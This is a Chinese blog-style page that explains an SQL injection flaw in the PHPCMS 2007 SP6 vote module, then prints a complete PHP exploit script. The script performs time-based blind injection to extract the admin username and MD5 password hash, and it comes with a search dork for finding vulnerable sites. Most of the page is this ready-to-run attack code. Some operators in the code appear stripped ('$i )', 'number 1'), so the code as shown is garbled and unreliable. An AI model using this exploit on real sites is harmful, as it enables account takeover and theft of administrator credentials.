欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

PHPCMS2007 SP6 vote模块SQL注射漏洞的分析

程序员文章站 2022-07-01 10:18:15
漏洞代码: vote/vote.php // 22行 $optionids = is_array($op) ? implode(',',$op) : $op; ... $db->query("UPDATE ".TABLE_VOTE_OPTION.&q... 08-10-08...

漏洞代码:

vote/vote.php

// 22行
$optionids = is_array($op) ? implode(',',$op) : $op;
...
$db->query("update ".table_vote_option." set number = number 1 where optionid in ($optionids) ");

漏洞很明显,没什么好说的,其他地方也有类似的问题,有兴趣的同学可以跟下,下面给个poc性质的exp[由于是盲注,效果不是很好]:p
代码:

#!/usr/bin/php
<?php

print_r('
---------------------------------------------------------------------------
phpcms 2007 sp6 bind sql injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "powered by phpcms 2007"
---------------------------------------------------------------------------
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r('
---------------------------------------------------------------------------
usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to phpcms
example:
php '.$argv[0].' localhost /phpcms/
---------------------------------------------------------------------------
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$benchmark = 100000000;
$timeout = 10;

$cmd = 'voteid=999999&attribute=1&op=999999)/**/and/**/ryat#';
$resp = send();
preg_match('/([a-z0-9] )_vote_option/', $resp, $pre);

if ($pre) {
echo "plz waiting...\n";
/**
* get admin password
*/
$j = 1;
$pass = '';

$hash[0] = 0; //null
$hash = array_merge($hash, range(48, 57)); //numbers
$hash = array_merge($hash, range(97, 102)); //a-f letters

while (strlen($pass) < 32) {
for ($i = 0; $i <= 255; $i ) {
if (in_array($i, $hash)) {
$cmd = 'voteid=999999&attribute=1&op=999999)/**/and/**/(if((ascii(substring((select/**/password/**/from/**/'.$pre[1].'_member/**/where/**/groupid=1/**/limit/**/1),'.$j.',1))='.$i.'),benchmark('.$benchmark.',char(0)),1))#';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$pass .= chr($i);
echo chr($i);
break;
}
}
if ($i == 255)
exit("\nexploit failed!\n");
}
$j ;
}
echo "\t";
/**
* get admin username
*/
$j = 1;
$user = '';

while (strstr($user, chr(0)) === false) {
for ($i = 0; i <= 255; $i ) {
$cmd = 'voteid=999999&attribute=1&op=999999)/**/and/**/(if((ascii(substring((select/**/username/**/from/**/'.$pre[1].'_member/**/where/**/groupid=1/**/limit/**/1),'.$j.',1))='.$i.'),benchmark('.$benchmark.',char(0)),1))#';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$user .= chr($i);
echo chr($i);
break;
}
if ($i == 255)
exit("\nexploit failed!\n");
}
$j ;
}

exit("expoilt success!\nadmin:\t$user\npassword(md5):\t$pass\n");
} else
exit("exploit failed!\n");

function send()
{
global $host, $path, $cmd;

$message = "post ".$path."vote/vote.php http/1.1\r\n";
$message .= "accept: */*\r\n";
$message .= "accept-language: zh-cn\r\n";
$message .= "content-type: application/x-www-form-urlencoded\r\n";
$message .= "user-agent: mozilla/4.0 (compatible; msie 6.00; windows nt 5.1; sv1)\r\n";
$message .= "client-ip: ".time()."\r\n";
$message .= "host: $host\r\n";
$message .= "content-length: ".strlen($cmd)."\r\n";
$message .= "connection: close\r\n\r\n";
$message .= $cmd;

$fp = fsockopen($host, 80);
fputs($fp, $message);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>